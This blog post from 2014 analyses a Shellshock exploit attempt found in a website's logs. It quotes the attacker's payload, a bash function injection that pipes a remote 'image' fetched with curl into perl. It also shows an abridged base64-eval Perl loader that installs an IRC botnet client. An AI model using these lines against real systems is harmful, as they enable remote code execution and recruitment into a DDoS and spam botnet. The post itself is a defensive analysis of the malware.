Tuesday, November 4, 2014

Aaaannddd we're back... ShellShock Payload analysis

    Wow, it's been a while, let's jump in. Okay, here's a bit of information on Shellshock. It's an exploit in a linux shell called bash estimated to have affected roughly seventy percent of the internet. This exploit affected Unix systems including but not limited to Android, OSX, and Linux. ShellShock allows an attacker to execute code on a vulnerable target machine. A shellshock exploit generally looks something like this: "() { :; }; echo 'Shellshock vulnerable'". This would allow an attacker to print "Shellshock vulnerable" to the console. Of course, this is an example, and isn't really dangerous. Let's look at something a bit more realistic.

    I'm working on a website and I, like many other admins have found some very interesting data in our logs. Please note that by executing any of the code I mention or link past this point, you'll most likely damage your computer, possibly irreversibly. With that disclaimer out of the way, let's get to the fun stuff. As I was looking through my logs for shellshock attempts, one particularly caught my eye. The attacker attempted to send me the following payload:

() { :; }; curl http://***.***.***.***/index.png | perl
 I decided it would be interesting to look at this "image", seeing as most images are not executable through perl. After loading the image into a text editor, my suspicions of an executable were confirmed. I found the following inside the "image"(abridged so as not to fill the page):
#!/usr/bin/perl
use MIME::Base64;
eval (decode_base64('I3lvdSBnb3Qgc2hl...DQo='));
This code essentially takes an encoded string, decodes it, and executes it. The source code is obfuscated using base64. Luckily, as demonstrated here, base64 is easily decodable. I then proceeded to decode the base64 and was excited to see that the source code was easily readable. The gist of the code that I discovered was adding the infected machine to a DDoS and spam email botnet, run through an IRC. As you can see by looking at the source (again, don't run it), the botnet is run by users "M","st0n3d","x00" and "Jorgee". Due to the nice, ascii-art filled interface, I'm guessing that they plan on selling their botnet. This attack was pretty well masked, though the server in question was patched for shellshock. Nice try though!